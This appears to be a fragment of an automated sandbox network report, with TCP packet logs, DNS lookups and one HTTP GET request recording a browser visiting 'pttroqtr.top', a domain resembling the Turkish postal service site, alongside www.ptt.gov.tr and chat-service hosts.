                                                                                                                                                                                            Sep 28, 2024 05:39:47.474359989 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.474483967 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.474586964 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.474617958 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.474647999 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.474662066 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.474663973 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.474668980 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.474694014 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.474841118 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.478152037 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.478271961 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.478319883 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.478478909 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.478486061 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.478605986 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.480838060 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481050968 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481168985 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481175900 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481323957 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481369972 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481549978 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481556892 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481676102 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481683016 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481795073 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.481838942 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.482405901 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.482413054 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.482572079 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.500859022 CEST49927443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:47.513087034 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.530962944 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.572891951 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.572964907 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573004007 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573019028 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573034048 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573117018 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573153973 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573168039 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573204994 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573215008 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573262930 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573307991 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573338985 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573348045 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573381901 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.573988914 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.574047089 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.574090004 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.574126005 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.574134111 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.574193954 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.574198008 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.574337959 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.574347019 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576458931 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576570988 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576623917 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576647997 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576693058 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576719046 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576728106 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576764107 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576788902 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576797009 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576833010 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576858997 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576863050 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576874018 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.576953888 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.577608109 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.577850103 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.577861071 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.577868938 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.577930927 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.577995062 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578068972 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578098059 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578206062 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578375101 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578432083 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578471899 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578478098 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578490973 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578557014 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578578949 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578615904 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578629971 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578639030 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578742027 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578793049 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578860998 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578965902 CEST49925443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:47.578982115 CEST4434992535.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.579022884 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.603533983 CEST44349916185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.603544950 CEST44349916185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.603584051 CEST44349916185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.603624105 CEST49916443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:47.603698969 CEST44349916185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.603727102 CEST44349916185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.603760958 CEST49916443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:47.603761911 CEST44349916185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.604053020 CEST49916443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:47.610618114 CEST443499288.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.610729933 CEST443499288.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.610871077 CEST49928443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:47.613153934 CEST49928443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:47.613178968 CEST443499288.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.614945889 CEST443499298.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.615010023 CEST443499298.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.615252018 CEST49929443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:47.615326881 CEST443499298.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.615354061 CEST49929443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:47.615415096 CEST49929443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:47.616323948 CEST49926443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.616339922 CEST4434992634.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.616925001 CEST443499308.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.616981983 CEST49942443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.616991997 CEST443499308.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.617043018 CEST4434994234.107.233.18192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.617083073 CEST49930443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:47.617396116 CEST443499278.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.617438078 CEST49942443192.168.2.534.107.233.18
                                                                                                                                                                                            Sep 28, 2024 05:39:47.617465019 CEST443499278.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:47.618144989 CEST49927443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:47.618308067 CEST49943443192.168.2.534.107.233.18
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                            Sep 28, 2024 05:39:18.117877007 CEST192.168.2.51.1.1.10x788eStandard query (0)pttroqtr.topA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:18.118231058 CEST192.168.2.51.1.1.10x2d98Standard query (0)pttroqtr.top65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:19.653019905 CEST192.168.2.51.1.1.10xaadcStandard query (0)pttroqtr.topA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:19.655102015 CEST192.168.2.51.1.1.10xeeb8Standard query (0)pttroqtr.top65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:21.215940952 CEST192.168.2.51.1.1.10x68a9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:21.217390060 CEST192.168.2.51.1.1.10xf2f9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:24.231086969 CEST192.168.2.51.1.1.10xe419Standard query (0)pttroqtr.topA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:24.231400967 CEST192.168.2.51.1.1.10xec6bStandard query (0)pttroqtr.top65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:25.253798008 CEST192.168.2.51.1.1.10xf3f0Standard query (0)pttroqtr.topA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:37.086395025 CEST192.168.2.51.1.1.10x82e7Standard query (0)www.ptt.gov.trA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:37.086551905 CEST192.168.2.51.1.1.10x1967Standard query (0)www.ptt.gov.tr65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:38.637630939 CEST192.168.2.51.1.1.10x6b46Standard query (0)pttem.alo-tech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:38.638083935 CEST192.168.2.51.1.1.10xef81Standard query (0)pttem.alo-tech.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.416888952 CEST192.168.2.51.1.1.10xaee6Standard query (0)pttem.alo-tech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.417448997 CEST192.168.2.51.1.1.10xb960Standard query (0)pttem.alo-tech.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.836920023 CEST192.168.2.51.1.1.10x652eStandard query (0)www.ptt.gov.trA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.837426901 CEST192.168.2.51.1.1.10x7699Standard query (0)www.ptt.gov.tr65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:43.287102938 CEST192.168.2.51.1.1.10x334dStandard query (0)chatserver.alo-tech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:43.287719011 CEST192.168.2.51.1.1.10xbeacStandard query (0)chatserver.alo-tech.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.346131086 CEST192.168.2.51.1.1.10x4cf6Standard query (0)pttem.alo-tech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.346549034 CEST192.168.2.51.1.1.10xc51aStandard query (0)pttem.alo-tech.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.347335100 CEST192.168.2.51.1.1.10xb86bStandard query (0)netdna.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.347548962 CEST192.168.2.51.1.1.10x2a23Standard query (0)netdna.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.394645929 CEST192.168.2.51.1.1.10xb146Standard query (0)chatserver.alo-tech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.394865990 CEST192.168.2.51.1.1.10x483dStandard query (0)chatserver.alo-tech.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.600155115 CEST192.168.2.51.1.1.10x1116Standard query (0)service-edge.alo-tech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.600295067 CEST192.168.2.51.1.1.10xf436Standard query (0)service-edge.alo-tech.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:47.647593021 CEST192.168.2.51.1.1.10xd07cStandard query (0)service-edge.alo-tech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:47.647942066 CEST192.168.2.51.1.1.10xc35Standard query (0)service-edge.alo-tech.com65IN (0x0001)false
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                            Sep 28, 2024 05:39:19.044090986 CEST1.1.1.1192.168.2.50x788eNo error (0)pttroqtr.top8.211.203.165A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:20.297653913 CEST1.1.1.1192.168.2.50xaadcNo error (0)pttroqtr.top8.211.203.165A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:21.222780943 CEST1.1.1.1192.168.2.50x68a9No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:21.224127054 CEST1.1.1.1192.168.2.50xf2f9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:25.289943933 CEST1.1.1.1192.168.2.50xe419No error (0)pttroqtr.top8.211.203.165A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:26.084197998 CEST1.1.1.1192.168.2.50xf3f0No error (0)pttroqtr.top8.211.203.165A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:30.469814062 CEST1.1.1.1192.168.2.50x9c3fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:30.469814062 CEST1.1.1.1192.168.2.50x9c3fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:32.008229017 CEST1.1.1.1192.168.2.50x86e2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:32.008229017 CEST1.1.1.1192.168.2.50x86e2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:37.140477896 CEST1.1.1.1192.168.2.50x82e7No error (0)www.ptt.gov.tr185.220.152.26A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:38.689426899 CEST1.1.1.1192.168.2.50x6b46No error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:38.689426899 CEST1.1.1.1192.168.2.50x6b46No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:38.689426899 CEST1.1.1.1192.168.2.50x6b46No error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:38.710926056 CEST1.1.1.1192.168.2.50xef81No error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:38.710926056 CEST1.1.1.1192.168.2.50xef81No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.463877916 CEST1.1.1.1192.168.2.50xb960No error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.463877916 CEST1.1.1.1192.168.2.50xb960No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.470833063 CEST1.1.1.1192.168.2.50xaee6No error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.470833063 CEST1.1.1.1192.168.2.50xaee6No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.470833063 CEST1.1.1.1192.168.2.50xaee6No error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:40.893219948 CEST1.1.1.1192.168.2.50x652eNo error (0)www.ptt.gov.tr185.220.152.26A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:43.314378023 CEST1.1.1.1192.168.2.50xbeacNo error (0)chatserver.alo-tech.comchat-server.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:43.321980000 CEST1.1.1.1192.168.2.50x334dNo error (0)chatserver.alo-tech.comchat-server.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:43.321980000 CEST1.1.1.1192.168.2.50x334dNo error (0)chat-server.alo-tech.com34.107.233.18A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.356148958 CEST1.1.1.1192.168.2.50x2a23No error (0)netdna.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.356708050 CEST1.1.1.1192.168.2.50xb86bNo error (0)netdna.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.356708050 CEST1.1.1.1192.168.2.50xb86bNo error (0)netdna.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.403291941 CEST1.1.1.1192.168.2.50x4cf6No error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.403291941 CEST1.1.1.1192.168.2.50x4cf6No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.403291941 CEST1.1.1.1192.168.2.50x4cf6No error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.417511940 CEST1.1.1.1192.168.2.50xc51aNo error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:44.417511940 CEST1.1.1.1192.168.2.50xc51aNo error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.419581890 CEST1.1.1.1192.168.2.50xb146No error (0)chatserver.alo-tech.comchat-server.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.419581890 CEST1.1.1.1192.168.2.50xb146No error (0)chat-server.alo-tech.com34.107.233.18A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.455454111 CEST1.1.1.1192.168.2.50x483dNo error (0)chatserver.alo-tech.comchat-server.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.643167973 CEST1.1.1.1192.168.2.50x1116No error (0)service-edge.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.643167973 CEST1.1.1.1192.168.2.50x1116No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.643167973 CEST1.1.1.1192.168.2.50x1116No error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.646375895 CEST1.1.1.1192.168.2.50xac99No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.646375895 CEST1.1.1.1192.168.2.50xac99No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.653137922 CEST1.1.1.1192.168.2.50xf436No error (0)service-edge.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:46.653137922 CEST1.1.1.1192.168.2.50xf436No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:47.687077999 CEST1.1.1.1192.168.2.50xc35No error (0)service-edge.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:47.687077999 CEST1.1.1.1192.168.2.50xc35No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:47.716252089 CEST1.1.1.1192.168.2.50xd07cNo error (0)service-edge.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:47.716252089 CEST1.1.1.1192.168.2.50xd07cNo error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:39:47.716252089 CEST1.1.1.1192.168.2.50xd07cNo error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:40:09.977019072 CEST1.1.1.1192.168.2.50xc436No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:40:09.977019072 CEST1.1.1.1192.168.2.50xc436No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:40:29.569732904 CEST1.1.1.1192.168.2.50x91a3No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:40:29.569732904 CEST1.1.1.1192.168.2.50x91a3No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                            Sep 28, 2024 05:40:34.412044048 CEST1.1.1.1192.168.2.50xc1f5No error (0)windowsupdatebg.s.llnwi.net87.248.205.0A (IP address)IN (0x0001)false
                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.5497098.211.203.165802584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Sep 28, 2024 05:39:19.054044008 CEST431OUTGET /help HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
